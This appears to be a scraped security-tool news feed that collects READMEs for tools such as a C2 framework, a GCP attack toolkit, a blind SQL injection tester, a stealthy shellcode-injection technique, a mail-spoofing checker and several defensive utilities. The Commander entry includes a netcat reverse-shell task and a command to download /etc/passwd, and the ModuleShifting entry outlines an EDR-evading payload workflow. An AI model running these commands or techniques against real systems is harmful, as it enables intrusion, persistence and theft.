In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.

 

pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path

probe = WebSecProbe(url, path)
probe.run()



TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!" 



GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category Primary Module Command Group Operation Description
User Authentication auth - activate Activate a Specific Authentication Method
- add Add a New Authentication Method
- delete Remove a Specific Authentication Method
- list List All Available Authentication Methods
Cloud Functions functions - list List All Deployed Cloud Functions
- permissions Display Permissions for a Specific Cloud Function
- triggers List All Triggers for a Specific Cloud Function
Cloud Storage storage buckets list List All Storage Buckets
permissions Display Permissions for Storage Buckets
Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



SecuSphere - Efficient DevSecOps

By: Zion3R


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

 Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



Commander - A Command And Control (C2) Server

By: Zion3R


Commander is a command and control framework (C2) written in Python, Flask and SQLite. It comes with two agents written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 is required to run and the following dependencies

Linux for the admin.py and c2_server.py. (Untested for windows)
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays inf o for all the availiable agents or for specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start' , 'stop' 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the availiable sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

Flows

Below you can find a normal flow diagram

Normal Flow

In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

Below is the flow diagram for this case.

Re-register Flow

Useful examples

To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

# show all availiable agents
show agent all

To instruct all the agents to run the command "id" you can do it like this:

To check the history/ previous results of executed tasks for a specific agent do it like this:
# check the results of a specific agent
show result 85913eb1245d40eb96cf53eaf0b1e241

You can also change the interval of the agents that checks for tasks to 30 seconds like this:

# to set it for all agents
task add all c2-sleep 30

To open a session with one or more of your agents do the following.

# find the agent/uuid
show agent all

# enable the server to accept connections
sessions server start 5555

# add a task for a session to your prefered agent
task add your_prefered_agent_uuid_here c2-session 5555

# display a list of available connections
sessions list

# select to attach to one of the sessions, lets select 0
sessions select 0

# run a command
id

# download the passwd file locally
download /etc/passwd

# list your files locally to check that passwd was created
local-ls

# upload a file (test.txt) in the directory where the agent is
upload test.txt

# return to the main cli
go back

# check if the server is running
sessions server status

# stop the sessions server
sessions server stop

If for some reason you want to run another external session like with netcat or metaspolit do the following.

# show all availiable agents
show agent all

# first open a netcat on your machine
nc -vnlp 4444

# add a task to open a reverse shell for a specific agent
task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

Obfuscation

The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

You can run it like this:

python3 obfuscator.py

# and to run the agent, do as usual
python3 obs_agent.py

Tips &Tricks

  1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
  1. Create a binary file for your python agent like this
pip install pyinstaller
pyinstaller --onefile agent.py

The binary can be found under the dist directory.

In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

  1. Create new certs in each engagement

  2. Backup your c2.db, it is easy... just a file

Testing

pytest was used for the testing. You can run the tests like this:

cd tests/
py.test

Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

To check the code coverage and produce a nice html report you can use this:

# pip3 install pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

By: Zion3R


JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


Prerequisites

Before installing JSpector, you need to have Jython installed on Burp Suite.

Installation

  1. Download the latest version of JSpector
  2. Open Burp Suite and navigate to the Extensions tab.
  3. Click the Add button in the Installed tab.
  4. In the Extension Details dialog box, select Python as the Extension Type.
  5. Click the Select file button and navigate to the JSpector.py.
  6. Click the Next button.
  7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

Usage

  • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
  • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications. 


Disclaimer:

This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

Installation

Install HBSQLI with following steps:

$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt

Usage/Examples

usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

Modes

There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command

Notes

  • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

  • You can use the provided headers file or even some more custom header in that file itself according to your need.

Demo



Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

By: Zion3R



Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

Well, Spoofy is different and here is why:

  1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
  2. Accurate bulk lookups
  3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
  4. SPF lookup counter

 

HOW TO USE

Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

Usage:
./spoofy.py -d [DOMAIN] -o [stdout or xls]
OR
./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

Install Dependencies:
pip3 install -r requirements.txt

HOW DO YOU KNOW ITS SPOOFABLE

(The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

METHODOLOGY

The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

DISCLAIMER

This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

CREDIT

Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

Logo: cobracode

Tool was inspired by Bishop Fox's project called spoofcheck.



Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

By: Zion3R

Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


What is Dissect?

Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

Singular approach

And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

Create a lightweight container using Acquire

Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

A modular setup

Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

Try it out now!

Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

Don’t know where to start? Check out the introduction page.

Want to get a detailed overview? Check out the overview page.

Want to read everything? Check out the documentation.

Projects

Dissect currently consists of the following projects.

Related

These projects are closely related to Dissect, but not installed by this meta package.

Requirements

This project is part of the Dissect framework and requires Python.

Information on the supported Python versions can be found in the Getting Started section of the documentation.

Installation

dissect is available on PyPI.

pip install dissect

Build and test instructions

This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

tox -e build

The build artifacts can be found in the dist/ directory.

tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

tox

For a more elaborate explanation on how to build and test the project, please see the documentation.



ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

By: Zion3R


ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


ModuleShifting, when used with shellcode payload, is performing the following operations:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. Overwrite shellcode over the target section
  4. add optional padding to better blend into false positive behaviour (more information here)
  5. Change permissions to RX
  6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
  7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.

When using a PE payload, ModuleShifting will perform the following operation:

  1. Legitimate hosting dll is loaded via LoadLibrary
  2. Change the memory permissions of a specified section to RW
  3. copy the PE over the specified target point section-by-section
  4. add optional padding to better blend into false positive behaviour
  5. perform base relocation
  6. resolve imports
  7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
  8. TLS callbacks execution
  9. Executing PE entrypoint

Why it's useful

ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.

There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)

  1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
  2. Shellcode execution using function pointer. This helps in avoid a new thread creation or calling unusual function callbacks.
  3. restoring of original dll content over the executed shellcode. This is a key difference.

The differences between Module Shifting and Module Overloading are the following:

  1. The PE can be written starting from a specified section instead of starting from the PE of the hosting dll. Once the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. PE header of the hosting dll is not overwritten or less bytes overwritten on .text section etc.)
  2. Padding that can be added to the PE payload itself to better blend into false positives.

Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.

Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

Usage

ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

  1. Clone the Pyramid repo:

git clone https://github.com/naksyn/Pyramid

  1. Generate a shellcode payload with your preferred C2 and drop it into Pyramid Delivery_files folder. See Caveats section for payload requirements.
  2. modify the parameters of moduleshifting.py script inside Pyramid Modules folder.
  3. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
  4. execute the generated cradle code on a python interpreter.

Caveats

To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

Detection opportunities

Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



KaliPackergeManager - Kali Packerge Manager

By: Zion3R


kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories. 


Features

  • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
  • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
  • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
  • System Updates: Keep your system up to date with the integrated update functionality.

Installation

To install KaliPm, you can simply clone the repository from GitHub:

git clone https://github.com/HalilDeniz/KaliPackergeManager.git

Usage

  1. Clone the repository or download the KaliPM.sh script.
  2. Navigate to the directory where the script is located.
  3. Make the script executable by running the following command:
    chmod +x kalipm.sh
  4. Execute the script using the following command:
    ./kalipm.sh
  5. Follow the on-screen instructions to select a category and choose the desired packages for installation.

Categories

  • System: Includes essential core items that are always included in the Kali Linux system.
  • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
  • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
  • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
  • Others: Contains additional packages and resources that don't fall into the above categories.

Update

KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.

Contributing

Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about Tool Name, please feel free to contact me:



VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

